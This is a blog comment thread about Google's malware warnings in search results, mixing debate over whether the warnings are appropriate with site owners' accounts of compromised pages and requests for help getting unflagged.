Won't this affect their claim to be common carriers? Did they even make that claim, or am I imagining things?

"Why does Google deploy the ultimate weapon of search delisting on sites using black-hat SEO techniques to game search rankings, while known evil malware sites get stern warning interstitials instead?"

Sites are delisted because they try to work around advertising system and get some money FROM Google. Evil sites still attract users, so they can be presented with ads that bring money TO Google. Just a business.

A certain country has tried to be the world's policeman. Gets lots of complaints. Is accused of being a bigger threat than the evil it tries to remove. I predict the same fate for Google.

I saw this feature a few months ago. Given that they still have the feature enabled, I guess people haven't complained much. I mean, it's there to protect users (like the IE phishing filter) and you can, after all, still visit the site it you want to.

Imagine a friend telling you to visit a site that you think sounds evil, how would you research your suspicion if google doesn't keep them listed?

Still, I am a little skeptical, when *anything* is proclaimed to be better, stronger, more useful and - *FREE*. Why anybody cares for my convenience and safety? Just a pure philanthropy?

But - and it si not only about the SW technologies - can anybody imagine the warning "This site may harm your mind /brain"?

> I saw this feature a few months ago

This is the first time I had seen it. I had to search for a site referenced in the article (and boy, there are some big-E Evil sites referenced in that article) to trigger the warning.

I'm thinking that's a *good* thing. :)

"Why does Google deploy the ultimate weapon of search delisting on sites using black-hat SEO techniques to game search rankings, while known evil malware sites get stern warning interstitials instead?"

There's a difference (alluded to above). One is commercial and the other moral. Most people will accept the defence 'I do this to protect my business' whereas 'I do this because it's good for you' is less acceptable due to its subjective nature.

I am very, very happy that google does this from a website admin point of view.

A few weeks ago I logged in to my site via a hotel (5 star I might add) to check mail and traffic etc. No problem, logged out and enjoyed my hoiday.

A couple of weeks later I get several emails from Google saying that my site is hosting malware, huh? They gotta be kidding!? But sure enough I went to the page they mention and my virus checker and IE started going mental showing warnings left, right and center.

I nearly died! I quickly checked the page html and a single line of javascript was inserted, I checked the update time and it was on the same day as I logged into that PC at the hotel. I then found that they had updated one other page. Someone had added some spyware to the hotel's pc which somehow detected that I had logged into a website and then FTPed updates to a couple of pages (this was in my ftp log). I didn't even use an FTP connection, just a webpage admin tool.

Google then had my site listed with the above warning, which of course meant my traffic went into free-fall. I then followed the procedure to clear my site.

So I went into lock-down mode and changed all my passwords to practically everything. My partner also changed all the passwords on everything she visited as well.

So yes, I lost quite a bit of traffic for about a month or so but I prefer that than having my visitors get infected via simply visiting my site.

So two things, never EVER trust any PC other than your own, and Google, for me, is still a friendly giant.

If you ask me, if Google did NOT show these evil sites then people would just think the Internet is one big, safe place. It is not. By doing so, Google makes everyone aware of the fact that there are certain dangers on the Internet. Others are just hiding these facts just to give people a more happy fealing.
I am aware of those risks. And considering how dangerous the Internet can be, I hope others are just as aware of the risks as me. Or maybe even more aware. Google has my support. The other search engines are just masking reality.

"A certain country has tried to be the world's policeman. Gets lots of complaints. Is accused of being a bigger threat than the evil it tries to remove. I predict the same fate for Google."

Based on what??
I couldn't even begin to list everything wrong with what you just said. Honestly, I want some of whatever you're on, just not as much as you're taking.

A little naive Jeff. "Drive by downloads" happen the moment to fire up IE, and have been for years. FF is a little better.

No one should be allowed to put 1 thing on my PC without my express consent (cookie, GIF, etc.), now look who's being naive.

I guess it's the *type* of garbage, not if there is garbage, that a site writes to my hard-drive...

"what value does keeping a site like that in your search index have for users?"

You answer you own question in the next sentence. Many of the sites are legitimate but may have held off on applying a certain patch to their web server just a little too long. It's a tough call- how do you distinguish a site that is merely unlucky or only a little bit negligent from one that is intentionally malicious? Where do you draw the line? Obviously removing the latter type of site from the search index is the best policy, but what about the former?

One one hand, by keeping non-purposefully malicious sites listed users may still be able to view Google's cached and sanitized version as well as the other normal information included in the listing. This way they may perhaps still provide some utility for google's users and the site's owners.

One the other hand, what about possibly permanent damage to a site's reputation resulting from being labeled as "potentially harmful"? Is there a scenario where that could constitute libel or slander? And that's aside from the people who may go on to the site anyway and then become infected.

What would happen if google warned people using it
that *their* IP had been used to send out spam.

Seems simple to implement as it's easy to receive
spam and check the source IP.

Would this get more people to fix their home
computers security?

I use McAfee's free SiteAdvisor, but you can't be too careful, so I think it's great that Google is getting involved. I am curious why Microsoft is so far behind providing help to its customers. Once again, Microsoft missed the boat.

"what value does keeping a site like that in your search index have for users?"

So Google can market the fact that they are protecting users. Your coverage is exactly what their marketers are seeking. It's like those movie trailers: Jeff Atwood says Google does "even more to protect users". By playing it quiet, live.com and ask.com get no good will for the same feature.

To my point, see the post by fxp:

"I am curious why Microsoft is so far behind providing help to its customers."

Google is marketing better.

Kevin,

Don't blame the hotel. If you typed your passwords on a wireless connection in plaintext (ie, non-SSL connection) they could have easily been sniffed off the air.

As to why Google would do this out of the goodness of their hearts, remember that more people using the internet more often is good for them. If my mom downloads one more computer-destroying piece of malware she might just swear off the internet forever, and then Google has lost her search dollars. Keeping the internet safe is in their general interest.

"what value does keeping a site like that in your search index have for users?"

If the user starts off in Google and does a search for the site, and gets a result back that tells them not to go to the site, the user may avoid the site. But if Google simply does not return any results, the user may try another avenue of getting to the site, thinking that Google is missing that site in its lists. The user then arrives at the site and gets infected.

I'd much rather the site come back in the results and then have Google tell me not to go there. Otherwise, I will find another way to get there and I'll never be warned.

So if I go to a site, click through several pages and then come across a link and click on it, does google warn me it's malicous? Nope, because google's my search engine and not my browser. So to me, it's a CYA tatic on Google's part. If they have a site listed or advertised that infects someone's pc in this legtigous society, someone will eventually sue Google. But where it really needs to be is the responsibility of the browser. It's downloading the page and is capable of doing the same payload evaluation. The only problem is that the browsers that have holes in them the size of the Grand Canyon are the reason why Google is warning people of malicous sites. Perhaps they should warn people they are using flawed browsers while they are at it.

But... who's watching the watchers?

http://bbaadd.com/blog/2007/01/whos-watching-watchers-stopbadware_11.html

Sorry, Jeff, it sounds like you're about four months behind the news cycle on this one, and on the wrong side of the issue. I don't care what Google thinks of Website X; I just want a search engine that will let me go to Website X if that's what I want to do. Computers (and Web utilities) should make our lives easier, not harder!

"StopBadware.org: Incompetence, or McCarthyism 2.0?"
http://www.adwarereport.com/mt/archives/stopbadwareorg.php

fred: No, they'd just assume Google was wrong, since "I didn't send any spam!".

Google have been doing this for a while now. It's a bad idea that will inevitably lead to lawsuits. They will not be able to catch all bad sites, and by implication any site they don't flag is ok. They could flag sites with nothing wrong, which could be potentially devastating to a websites reputation.

Google is a search engine, it is not their role to pass judgement on the sites returned in search results. Far from making the internet safer, they are actually increasing the risk to themselves and others. They really haven't thought this through at all.

> http://bbaadd.com/blog/2007/01/whos-watching-watchers-stopbadware_11.html

What a coincidence, I was literally just at that Life in Hell fansite last week via a Google search. It must have been cleared since January, because I certainly didn't see the malware warning in my Google results. I just searched for it again, and it's clean.

Point taken about notifying people whose websites are compromised or otherwise accidentally hosting malware. Removal from the search index is more subtle (and more painful) than a prominent, hard-to-miss warning with links back to the Google support page for the malware topic.

> Perhaps they should warn people they are using flawed browsers while they are at it.

Like I said, I think the malware problem is so big that you have to attack it on multiple fronts. I agree that users should be nagged about using a modern browser.

How about site advisor which is now part of macfee.

I agree with mpbk. Nobody likes it when an authority (person/company/thing/group etc) starts taking decisions out of your hands instead of warning, guiding and educating you. I definitely want to know when a site or link is likely to be harmful but if I really want to click that link, then that should be my right. And if I get a rig full of crap-ware then that’s my problem. Users, at some point, need to take responsibility for their actions. Making the internet (and Google) uber-safe for the lowest common denominator only serves to bring the whole thing down, not move it forward.

Mark,

It happened from their internet cafe (guests only) from what I understood to be a wired in network. My feeling is that the PCs were infected with spyware. It would make sense for someone to install stuff like that on PCs in such an exclusive hotel, anyone logging into anything there is more likely to be connecting to some fairly interesting stuff.

"I applaud the effort, but what value does keeping a site like that in your search index have for users?"

A common user will see that Google blocked the page. He will not see that the other engines delisted it. What does the better marketing for you?

Right, if you do something good for the user: Let him know. It doesn't help him, but it does help your image.

google, if they are serious about this, may need to visit a page more than once, firstly as usual (aka googlebot) and secondly a simple script that identifies itself as IE, to see if the result is different. they may already do this but i can see 'bad' sites being modified so google sees no evil to game this one.

its a good idea, but a browser warning isn't, people will ignore it.

I'd like to see the "this site may harm your computer" link being a bit more obvious, maybe having the link in a different colour, also the advanced seacrh being able to filter out such sites (off by default)

"To do nothing-- to let these purely evil sites show up in Google results with no warning whatsoever-- would be irresponsible."

I disagree, Google is a search engine - not the internet police. Its great that Google is offering such features as value-add to the users. But if they dont do it, its not irresponsible or negligence.

The line must be drawn as to what is a great offering, and what a provider must provide (ie your expectations). And in this case Google does not need to provide anything. Youo should be happy with what you get - its free.

I am not so sure they do it correctly.
The best way would be to have a tool in their
webmaster control panel to say the issue has been fixed.
They also should show which webpages and why they are infected.
Just like any other anti-virus program does.

I have several sites who got the uniqu-soft.com javascript
at the end of the index.php and now basically all my sites are not accessible although i removed the script.
Thats pretty lame from google. It should be quick and automatic. but waiting and waiting for my indexed pages to be recognized again as clean is just stupid and old technology

hi

My Site www.etatvasoft.com is displayed on google page in
THIS SITE MAY HARM YOUR COMPUER. So what i do remove the HARM.
and also i Google or and one site me inform any time me alert form
your site HARM. So can also remove the HARM..

Rakesh
eTatvasoft

hi,
My site http://www.scarves-stoles-pareos.com is displayed on google page in This site may harm your computer. so what i do that my website and computer has cleaned. pl. give me some idea.

chandan
Email :- chandan@syscommsolutions.com
:- chunnu.chandan@gmail.com

Hi ,
Our site http://www.relaxindochina.com getthe same trouple with some code of script at our bottom sites, when we found it and removed , even we use the Stopbadwave Form to receive what we did to make our site safer, but Goolge still flag us

Google's Matt Cutts has an update which describes the "This Site May Harm Your Computer" initiative in more detail. It also provides instructions on how to fix your site if you've been flagged by Google:

http://www.mattcutts.com/blog/closing-the-loop-on-malware/

Why should any website harm anyone's compuer stupid people.!

Nice that you're all sharing the thoughts you have on badware/malware and that many of you feel this is neccesary.

Websites can hamr your computer if you're not technically inclined to fix everything yourself. It's a fact that most users of computers are users, and not administrators or don't have the knowledge to see the problems. As a matter of fact, many of the webmasters having his site marked as possibly dangerous doesn't even know what is going on.

Google is making people aware, and by joining with Stopbadware.org they are trying to give a place where you can seek some comunity help and possibly get the issues fixed quickly. I can only encourage webmaster experiencing this problem to visit the Stopbadware site and google group to get to know more about the subject.

As for hotels, Internet cafe's and public computers in general not to be blamed for badware or any kinds of abuse, I think they should be blamed fully. The respective owners of the computers, even though they are publicly shared, should make sure that this cannot happen, they owe that to their visitors. I've had an internet cafe for 10+ years, and it's never happened to me or any of my customers, so it's absolutely possible with a little work.

Here's where Google is bad: To have your innocent site unflagged, Google's form will not work unless you first admit that you believe your site has done bad things...even when it hasn't. In my opinion, this is an abuse of power.

my site virtualdarpan also is recently flagged with warning message. when i check my site code then i found some hackers insert unescape(%jhasgd%hg%) something like that a big javascript code. which when unescaped gives few iframes with link to hackers site which downloads viruses and keyloggers etc.

but still i am wondering how spammers insert such code at the end of each file in my server. ?!?

My Site www.allhoteldeals.net is displayed on google page in
THIS SITE MAY HARM YOUR COMPUER. So what should i do to remove the HARM. explain me breefly

thanks & regards
ravi
ravi_seo@yahoo.co.in

Even my site "Free ebooks collection" was getting this message. After reading on internet I came to know that this message was there because of one advertiser network whose script I was using in my site. After removing that script from my site and requesting for review , the message got removed.

Let me tell you guys what happened to me yesterday.

I run a celebrity blog and went searching for info on a female singer. I followed a link via Google to her website and I got the above warning. I had seen that warning on previous sites and stayed away. However, when I saw it for this site, which I had just visited about 2 weeks earlier I ignore it and clicked the link.

The site was moving slowly and after about a minute or so my computer shut down and restarted. When I got back to desktop I had a error saying my comp was infected and there was a NEW anti virus software on my computer that shut down my McAfee virus software.

To save my life I cannot remember the name of this software but I did a search on how to remove it and nothing worked as it installs an icon in your tray that keeps re-installing it, even after you un-install it. As a last resort I had to do a system restore which solved the problem- hopefully.

So my advice is heed that WARNING when you see it- I should have.

Why would google want to state that my site is harmful for Hawaiian Blog? WHY? No script is installed except their adsense javascript thats it! ...today i noticed google flaged my site with "this site may harm your computer" WTF?????????

if you go to http://www.hawaiib.com you will clearly see there is nothing harmful except few pictures from hawaii and posts..

but if you go to google.com type let say hawaiian blog you will get prompted and asked if you really want to access it?

I hate this i swear.

The instructions on how to fix this are at Matt Cutts blog, which I linked in an earlier comment.

http://www.mattcutts.com/blog/closing-the-loop-on-malware/

Use the Google webmaster tools!

http://www.google.com/webmasters/

Some features of the Google webmaster tools:
--
* New: Request a malware review from Google and we’ll evaluate your site.
* New: Check the status of your review.
* If we feel the site is still harmful, we’ll provide an updated list of remaining dangerous URLs
* If we’ve determined the site to be clean, you can expect removal of malware messages in the near future (usually within 24 hours).
--

Great mate !! This article might be helpful as this is simple and short !! http://ankitrawat.com/blog/remove-google-search-warning-message/